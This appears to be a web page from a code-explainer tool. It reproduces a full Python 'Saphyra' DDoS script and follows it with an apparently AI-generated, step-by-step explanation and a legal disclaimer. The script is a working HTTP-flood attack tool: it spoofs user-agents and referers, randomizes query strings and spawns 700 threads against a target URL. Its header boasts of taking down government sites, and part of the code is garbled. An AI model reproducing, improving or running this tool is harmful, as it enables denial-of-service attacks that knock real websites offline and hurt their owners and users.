This code is a tool designed to perform Distributed Denial...

January 11, 2025 at 10:08 AM

# ---------------------------------------------------------------------------------------------- # Saphyra - DDoS Tool # # The DDoS Protocol is the most massive type of attack # This tool can tangodown nasa and more gov websites # # # author : Anonymous , version 1.0 # ---------------------------------------------------------------------------------------------- import urllib2 import sys import threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=9999 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)') headers_useragents.append('Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E') u=https://www.facebook.com/l.php?u=') headers_referers.append('https://drive.google.com/viewerng/viewer?url=') headers_referers.append('http://www.google.com/translate?u=') headers_referers.append('https://developers.google.com/speed/pagespeed/insights/?url=') headers_referers.append('http://help.baidu.com/searchResult?keywords=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('https://add.my.yahoo.com/rss?url=') headers_referers.append('https://play.google.com/store/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://' + host + '/') return(headers_referers) #builds random ascii string def buildblock(size): out_str = '' for i in range(0, size): a = random.randint(65, 160) out_str += chr(a) return(out_str) def usage(): print 'Saphyra DDoS Tool ( individual Dangerous Denial of Service )' print 'New loaded Botnets: 1,798,445,657' print 'Usage: Saphyra (url)' print 'Example: Saphyra.py http://luthi.co.il/' print "\a" print \ """ ,-. ( O_) / `-/ /-. / / ) / / _ /-. / (_)*-._ / ) *-._ *-'**( )/ *-/*-._* `. / *-.'._ /\ /-._*-._ _,---...__ / ) _,-*/ *-(_) ___<__(|) _ **-/ / / / ' `----' **-. \/ / / ) ] / / ____..-' // / ) ,-** __.,'/ / ___ /, / ,--**/ / / /,-** ***-. ,'/ [ ( / / / / ,.---,_ `._ _,-',' \ `-./ / / / / `-._ *** ,-' `-._ / / / /_,' **--* */ / / /* / / / / / / / / / |,' / : / / [ / ,' ~>Saphyra DDoS Tool<~ | / ,' ~~>Created By Anonymous<~~ |/,-' ' """ #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count("?")>0: param_joiner="&" else: param_joiner="?" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(50,100))) request.add_header('Keep-Alive', random.randint(110,160)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print "----->>> ! We are Anonymous - ExpectUS ! <<<-----" code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==500) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+100<request_counter) & (previous<>request_counter): previous=request_counter if flag==2: print "\n-- Sending mass amounf of packets generated by Liphyra Botnet --" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]=="help": usage() sys.exit() else: print "Starting the Attack" print "ANONYMOUS" if len(sys.argv)== 3: if sys.argv[2]=="safe": set_safe() url = sys.argv[1] if url.count("/")==2: url = url + "/" m = re.search('http\://([^/]*)/?.*', url) host = m.group(1) for i in range(700): t = HTTPThread() t.start() t = MonitorThread() t.start()

This code is a tool designed to perform Distributed Denial of Service (DDoS) attacks. Here's what it does in detail:

  1. Global Variables:

    • url: The target website URL for the DDoS attack.
    • host: The hostname extracted from the target URL.
    • headers_useragents and headers_referers: Lists of user-agent strings and referer headers used to create realistic-looking HTTP requests.
    • request_counter: Counter for the number of HTTP requests sent.
    • flag and safe: Control flow variables for halting or safely exiting the attack.

  2. User-Agent and Referer Lists:

    • The function useragent_list populates headers_useragents with various user-agent strings to mimic different browsers.
    • Similarly, headers_referers is populated with various URLs to make requests appear legitimate.

  3. HTTP Flooding Mechanism:

    • The httpcall function sends a randomly-constructed HTTP GET request to the target URL. The request includes:
      • Custom headers such as User-Agent, Cache-Control, Accept-Charset, and Referer to mimic real browser interactions.
      • Random query parameters constructed using the buildblock function to appear like legitimate traffic.
    • It attempts to open an HTTP connection and handle responses. If the server returns an error (e.g., HTTP 500), the attack continues or halts based on whether the script is in "safe mode."
    • The set_flag and set_safe functions control the termination behavior.

  4. Multithreading:

    • The HTTPThread class repeatedly invokes the httpcall function in multiple parallel threads to flood the target with requests, simulating a DDoS.
    • The MonitorThread class tracks the progress of HTTP threads by monitoring the number of requests sent (request_counter).

  5. Command-Line Interface:

    • When the script is executed, it:
      • Reads the target URL from the command-line arguments.
      • If the safe parameter is provided, the set_safe function is activated to enable safe mode.
      • Launches multiple threads (700 HTTP threads by default) to perform the DDoS attack in parallel, as well as a monitor thread.

  6. Intended Purpose:

    • According to the comments and functionality, this tool is built explicitly for carrying out DDoS attacks against web servers by overwhelming them with a massive number of HTTP GET requests, simulating high traffic and potentially taking the server offline.

Disclaimer: This script is illegal to use in most jurisdictions for any purpose other than sanctioned and ethical penetration testing (and only with appropriate permissions). DDoS attacks are malicious and can cause significant harm to targeted entities. Studying or understanding such scripts should only be done for educational purposes or defensive measures.

Generate your own explanations
Download our vscode extension
Read other generated explanations

Built by @thebuilderjr
Sponsored by beam analytics
Read our terms and privacy policy
Forked from openai-quickstart-node